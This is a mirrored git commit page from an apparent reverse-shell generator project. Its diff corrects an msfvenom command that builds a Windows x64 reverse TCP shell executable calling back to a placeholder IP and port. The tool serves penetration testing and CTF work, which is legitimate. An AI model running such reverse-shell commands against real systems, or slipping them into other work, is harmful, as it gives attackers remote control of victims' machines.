mirror of
https://github.com/0dayCTF/reverse-shell-generator.git
synced 2024-12-18 19:06:09 +00:00
Fixing "Windows Staged Reverse TCP (x64)"
Small typo for the command used to generate a Windows Staged Reverse TCP (x64). Modified the msfvenom payload to "windows/x64/shell_reverse_tcp" which should remediate this issue and allow for easier copypasta.
This commit is contained in:
parent
84f7b5dc41
commit
ccda4bee19
@ -350,7 +350,7 @@ const msfvenomCommands = withCommandType(
|
||||
},
|
||||
{
|
||||
"name": "Windows Staged Reverse TCP (x64)",
|
||||
"command": "msfvenom -p windows/x64/reverse_tcp LHOST={ip} LPORT={port} -f exe -o reverse.exe",
|
||||
"command": "msfvenom -p windows/x64/shell_reverse_tcp LHOST={ip} LPORT={port} -f exe -o reverse.exe",
|
||||
"meta": ["msfvenom", "windows", "staged", "meterpreter", "reverse"]
|
||||
},
|
||||
{
|
||||
|
Loading…
Reference in New Issue
Block a user